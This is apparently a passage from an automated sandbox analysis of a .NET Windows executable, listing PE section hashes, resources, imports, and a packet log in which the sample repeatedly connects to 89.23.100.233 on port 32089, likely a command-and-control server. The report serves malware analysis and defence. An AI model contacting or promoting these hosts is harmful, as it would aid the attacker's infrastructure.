                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x47d740x57.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x5ae.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a0000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x45dd40x45e0027daab8f368ecf41af2b6118b0468c64False0.4570557077370304data5.595000262158807IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x480000x5ae0x6008868a3744e55c20cd447f55a71c0cfe6False0.423828125data4.075422995246891IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x4a0000xc0x200e9e66b5e7836ecf366f34ef7d9162967False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_VERSION0x480a00x324data0.43407960199004975
                                                                    RT_MANIFEST0x483c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 5, 2024 13:10:58.456578016 CET49756443192.168.11.2084.32.84.100
                                                                    Dec 5, 2024 13:10:58.456676960 CET4434975684.32.84.100192.168.11.20
                                                                    Dec 5, 2024 13:10:58.456861019 CET49756443192.168.11.2084.32.84.100
                                                                    Dec 5, 2024 13:10:58.465698004 CET49756443192.168.11.2084.32.84.100
                                                                    Dec 5, 2024 13:10:58.465727091 CET4434975684.32.84.100192.168.11.20
                                                                    Dec 5, 2024 13:10:58.952630997 CET4434975684.32.84.100192.168.11.20
                                                                    Dec 5, 2024 13:10:58.952848911 CET49756443192.168.11.2084.32.84.100
                                                                    Dec 5, 2024 13:10:58.956934929 CET49756443192.168.11.2084.32.84.100
                                                                    Dec 5, 2024 13:10:58.956963062 CET4434975684.32.84.100192.168.11.20
                                                                    Dec 5, 2024 13:10:58.957484007 CET4434975684.32.84.100192.168.11.20
                                                                    Dec 5, 2024 13:10:58.993479967 CET49756443192.168.11.2084.32.84.100
                                                                    Dec 5, 2024 13:10:59.034251928 CET4434975684.32.84.100192.168.11.20
                                                                    Dec 5, 2024 13:10:59.758460999 CET4434975684.32.84.100192.168.11.20
                                                                    Dec 5, 2024 13:10:59.762635946 CET4434975684.32.84.100192.168.11.20
                                                                    Dec 5, 2024 13:10:59.762763977 CET4434975684.32.84.100192.168.11.20
                                                                    Dec 5, 2024 13:10:59.762821913 CET49756443192.168.11.2084.32.84.100
                                                                    Dec 5, 2024 13:10:59.762937069 CET49756443192.168.11.2084.32.84.100
                                                                    Dec 5, 2024 13:10:59.765357018 CET49756443192.168.11.2084.32.84.100
                                                                    Dec 5, 2024 13:11:10.786494970 CET4975780192.168.11.20104.16.185.241
                                                                    Dec 5, 2024 13:11:10.910146952 CET8049757104.16.185.241192.168.11.20
                                                                    Dec 5, 2024 13:11:10.910439014 CET4975780192.168.11.20104.16.185.241
                                                                    Dec 5, 2024 13:11:10.910578966 CET4975780192.168.11.20104.16.185.241
                                                                    Dec 5, 2024 13:11:11.034549952 CET8049757104.16.185.241192.168.11.20
                                                                    Dec 5, 2024 13:11:11.044116974 CET8049757104.16.185.241192.168.11.20
                                                                    Dec 5, 2024 13:11:11.097847939 CET4975780192.168.11.20104.16.185.241
                                                                    Dec 5, 2024 13:11:18.403750896 CET4975832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:18.665327072 CET320894975889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:19.174123049 CET4975832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:19.433252096 CET320894975889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:19.939558983 CET4975832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:20.198769093 CET320894975889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:20.705096960 CET4975832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:20.964309931 CET320894975889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:21.470525980 CET4975832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:21.729711056 CET320894975889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:22.236149073 CET4975932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:22.499629021 CET320894975989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:23.001425982 CET4975932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:23.261048079 CET320894975989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:23.766879082 CET4975932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:24.026401997 CET320894975989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:24.532339096 CET4975932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:24.791630983 CET320894975989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:25.297840118 CET4975932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:25.557238102 CET320894975989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:26.063503981 CET4976032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:26.323013067 CET320894976089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:26.828697920 CET4976032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:27.088210106 CET320894976089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:27.594157934 CET4976032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:27.854892969 CET320894976089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:28.359769106 CET4976032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:28.619589090 CET320894976089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:29.125132084 CET4976032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:29.384670019 CET320894976089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:29.890830994 CET4976132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:30.150563002 CET320894976189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:30.655987978 CET4976132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:30.916224957 CET320894976189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:31.421607018 CET4976132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:31.681363106 CET320894976189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:32.187225103 CET4976132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:32.446922064 CET320894976189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:32.952554941 CET4976132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:33.212513924 CET320894976189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:33.718094110 CET4976232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:33.978727102 CET320894976289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:34.483612061 CET4976232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:34.743202925 CET320894976289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:35.248883963 CET4976232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:35.508801937 CET320894976289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:36.014451027 CET4976232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:36.274719000 CET320894976289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:36.779697895 CET4976232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:37.039282084 CET320894976289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:37.545368910 CET4976332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:37.805562973 CET320894976389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:38.310929060 CET4976332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:38.570280075 CET320894976389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:39.076112986 CET4976332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:39.336026907 CET320894976389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:39.841525078 CET4976332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:40.100971937 CET320894976389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:40.607111931 CET4976332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:40.866338968 CET320894976389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:41.372649908 CET4976532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:41.632105112 CET320894976589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:42.138091087 CET4976532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:42.397764921 CET320894976589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:42.903673887 CET4976532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:43.163398981 CET320894976589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:43.668849945 CET4976532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:43.928287029 CET320894976589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:44.434472084 CET4976532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:44.693830013 CET320894976589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:45.200104952 CET4976632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:45.459999084 CET320894976689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:45.965172052 CET4976632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:46.225430965 CET320894976689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:46.730823040 CET4976632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:46.991516113 CET320894976689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:47.496202946 CET4976632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:47.756242037 CET320894976689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:48.261539936 CET4976632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:48.521487951 CET320894976689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:49.027221918 CET4976732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:49.287363052 CET320894976789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:49.792613029 CET4976732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:50.052078962 CET320894976789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:50.558023930 CET4976732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:50.817570925 CET320894976789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:51.323410034 CET4976732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:51.583103895 CET320894976789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:52.088951111 CET4976732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:52.348805904 CET320894976789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:52.855249882 CET4976832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:53.114901066 CET320894976889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:53.620045900 CET4976832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:53.879767895 CET320894976889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:54.385238886 CET4976832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:54.645189047 CET320894976889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:55.150542021 CET4976832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:55.410403967 CET320894976889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:55.916134119 CET4976832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:56.175992012 CET320894976889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:56.681746960 CET4976932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:56.941669941 CET320894976989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:57.447223902 CET4976932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:57.706456900 CET320894976989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:58.212426901 CET4976932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:58.472050905 CET320894976989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:58.978032112 CET4976932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:11:59.237617016 CET320894976989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:11:59.743547916 CET4976932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:00.002795935 CET320894976989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:00.508939028 CET4977032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:00.768323898 CET320894977089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:01.274403095 CET4977032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:01.533962011 CET320894977089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:02.039722919 CET4977032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:02.299520016 CET320894977089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:02.805342913 CET4977032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:03.064946890 CET320894977089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:03.570915937 CET4977032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:03.830455065 CET320894977089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:04.336419106 CET4977132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:04.596240044 CET320894977189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:05.101504087 CET4977132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:05.361217976 CET320894977189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:05.866952896 CET4977132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:06.126665115 CET320894977189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:06.632771969 CET4977132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:06.892832041 CET320894977189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:07.398052931 CET4977132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:07.657634020 CET320894977189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:08.164151907 CET4977232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:08.423937082 CET320894977289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:08.928797007 CET4977232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:09.188416004 CET320894977289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:09.694199085 CET4977232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:09.953660965 CET320894977289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:10.460022926 CET4977232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:10.719687939 CET320894977289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:11.225394011 CET4977232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:11.485069036 CET320894977289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:11.990864992 CET4977332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:12.250678062 CET320894977389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:12.756221056 CET4977332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:13.016201019 CET320894977389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:13.521657944 CET4977332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:13.781640053 CET320894977389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:14.287004948 CET4977332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:14.546767950 CET320894977389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:15.052642107 CET4977332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:15.312589884 CET320894977389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:15.818157911 CET4977432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:16.077905893 CET320894977489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:16.583695889 CET4977432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:16.843548059 CET320894977489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:17.348779917 CET4977432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:17.608302116 CET320894977489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:18.114219904 CET4977432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:18.373795986 CET320894977489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:18.879637003 CET4977432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:19.139071941 CET320894977489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:19.645272017 CET4977532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:19.904793978 CET320894977589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:20.410556078 CET4977532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:20.670135021 CET320894977589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:21.176125050 CET4977532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:21.435755968 CET320894977589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:21.941450119 CET4977532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:22.201677084 CET320894977589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:22.706944942 CET4977532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:22.966423988 CET320894977589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:23.472696066 CET4977632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:23.732352972 CET320894977689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:24.237827063 CET4977632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:24.497513056 CET320894977689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:25.003299952 CET4977632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:25.262996912 CET320894977689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:25.768795013 CET4977632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:26.028275967 CET320894977689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:26.534375906 CET4977632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:26.793761969 CET320894977689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:27.300060987 CET4977732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:27.559773922 CET320894977789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:28.065268040 CET4977732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:28.325084925 CET320894977789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:28.830599070 CET4977732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:29.089895964 CET320894977789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:29.596309900 CET4977732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:29.855775118 CET320894977789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:30.361460924 CET4977732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:30.621357918 CET320894977789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:31.127238989 CET4977832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:31.386558056 CET320894977889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:31.892487049 CET4977832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:32.151690960 CET320894977889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:32.657892942 CET4977832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:32.917184114 CET320894977889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:33.423348904 CET4977832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:33.683070898 CET320894977889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:34.188986063 CET4977832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:34.448520899 CET320894977889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:34.954449892 CET4977932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:35.213964939 CET320894977989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:35.719659090 CET4977932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:35.980490923 CET320894977989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:36.485261917 CET4977932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:36.745516062 CET320894977989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:37.250597000 CET4977932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:37.510107040 CET320894977989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:38.016000986 CET4977932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:38.275681019 CET320894977989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:38.781790972 CET4978032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:39.041183949 CET320894978089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:39.546889067 CET4978032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:39.781801939 CET4975780192.168.11.20104.16.185.241
                                                                    Dec 5, 2024 13:12:39.806143045 CET320894978089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:39.905786991 CET8049757104.16.185.241192.168.11.20
                                                                    Dec 5, 2024 13:12:39.905972958 CET4975780192.168.11.20104.16.185.241
                                                                    Dec 5, 2024 13:12:40.312324047 CET4978032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:40.571620941 CET320894978089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:41.077866077 CET4978032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:41.337076902 CET320894978089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:41.843246937 CET4978032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:42.102581024 CET320894978089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:42.608877897 CET4978132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:42.868354082 CET320894978189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:43.374190092 CET4978132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:43.633820057 CET320894978189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:44.139695883 CET4978132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:44.399204016 CET320894978189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:44.905127048 CET4978132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:45.164833069 CET320894978189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:45.670577049 CET4978132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:45.930186033 CET320894978189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:46.436144114 CET4978232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:46.695452929 CET320894978289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:47.201523066 CET4978232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:47.461103916 CET320894978289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:47.966975927 CET4978232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:48.226327896 CET320894978289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:48.732388973 CET4978232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:48.991954088 CET320894978289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:49.497857094 CET4978232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:49.757467985 CET320894978289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:50.263541937 CET4978332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:50.522924900 CET320894978389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:51.028772116 CET4978332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:51.287976027 CET320894978389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:51.841058969 CET4978332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:52.100168943 CET320894978389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:52.637759924 CET4978332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:52.897634029 CET320894978389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:53.530225039 CET4978332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:53.789341927 CET320894978389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:54.293792963 CET4978432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:54.553005934 CET320894978489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:55.059150934 CET4978432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:55.318543911 CET320894978489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:55.824628115 CET4978432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:56.084131002 CET320894978489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:56.590019941 CET4978432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:56.849216938 CET320894978489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:57.355453968 CET4978432089192.168.11.2089.23.100.233
